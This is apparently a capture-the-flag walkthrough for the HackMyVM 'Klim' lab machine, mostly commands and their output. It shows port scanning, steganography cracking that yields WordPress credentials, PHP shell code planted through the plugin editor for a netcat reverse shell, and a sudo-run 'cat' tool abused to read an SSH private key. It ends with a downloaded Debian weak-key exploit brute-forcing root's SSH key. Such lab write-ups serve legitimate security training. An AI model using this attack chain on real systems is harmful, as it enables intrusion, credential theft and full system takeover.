HackMyVm Klim Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Klim
Scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
| 256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
|_ 256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Ubuntu Default Page: It works Annex02!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelScan port 80, found wordpress.
```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.
```bash
~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
</code></pre>
<p>Found decrypt password, get file dump.</p>
<pre><code class="language-bash"> ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt steghide-0 | 1 [10:35:13]
StegSeek version 0.5
Progress: 10.94% (15259007 bytes)
[i] --> Found passphrase: "ichliebedich"
[i] Original filename: "dump"
[i] Extracting to "image.jpg.out"
~ mv image.jpg.out dump</code></pre>
<p>Found login credentials in dump.</p>
<pre><code class="language-bash">~ cat dump|grep pwd
log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
ss7WhrrnnHOZC#9bQn
</code></pre>
<p>Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.</p>
<p>Then get reverse shell.</p>
<pre><code class="language-bash"> ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:57032.
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
04:51:34 up 29 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre>
<p>Check sudo -l of www-data.</p>
<pre><code class="language-bash"> www-data@klim:/home/klim$ sudo -l
sudo -l
Matching Defaults entries for www-data on klim:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on klim:
(klim) NOPASSWD: /home/klim/tool</code></pre>
<p>Decompile tool, read the source code. It actually does "cat argv[1]".</p>
<p>```c
int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
{
size_t v3; // rbx
size_t v4; // rax
char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
char *dest; // [rsp+20h] [rbp-20h]
size_t size; // [rsp+28h] [rbp-18h]</p>
<p>strcpy(s, "cat ");
v3 = strlen(s);
size = v3 + strlen(argv[1]) + 1;
dest = (char *)malloc(size);
strncpy(dest, s, size);
v4 = strlen(s);
strncat(dest, argv[1], size - v4);
system(dest);
return 0;
}</p>
<pre><code>
Get ssh key of user klim.
```bash
www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
sudo -u klim ./tool .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
...
jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
-----END OPENSSH PRIVATE KEY-----
www-data@klim:/home/klim$Login ssh as klim.
~ ssh klim@192.168.56.100 -i id_rsa
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
/usr/bin/xauth: file /home/klim/.Xauthority does not exist
klim@klim:~$ id
uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)Found id_rsa.pub in /opt, following author's hint, use openssl
```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...
Following the steps in poc.
```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -jxvf 5622.tar.bz2
python 5720.py rsa/2048 192.168.56.100 root 22
Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100
Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/secGet root login.
```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim